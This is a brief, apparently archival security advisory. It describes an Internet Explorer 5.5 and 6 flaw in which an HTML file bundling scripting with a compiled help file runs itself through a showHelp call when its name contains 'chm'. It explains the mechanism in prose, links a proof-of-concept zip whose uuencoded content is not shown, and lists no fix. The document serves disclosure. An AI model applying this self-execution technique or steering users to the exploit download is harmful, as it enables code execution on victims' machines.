COMMAND

    Internet Explorer html file self execution

SYSTEMS AFFECTED

    IE5.5 and IE6
    Tested on w98 and w2000

PROBLEM

    http-equiv from [http://www.malware.com] found a funny bug in Internet Explorer:

    The following file is an html file comprising both scripting and a compiled help file [*.chm]. We inject scripting into the actual help file which is designed to point back to the html file and execute it.

    Provided the html file name contains the 'word' chm in it, Internet Explorer 5.5 and 6.0 executes it. Because it is an html file proper, Internet Explorer opens it. The scripting inside is then parsed and fired. That scripting is pointing back to the same file with a showHelp call and because that is precisely what it is, it executes!

    Tested on win98 IE5.5 and IE6.

    Constructed for win98: [harmless *.exe - requires positioning of Mshta.exe @ C:\WINDOWS\SYSTEM]

    File
    ====

    Download from http://www.malware.com/html.zip or uudecode this:

    [uuencoded attachment: html.zip]

SOLUTION

    Nothing yet.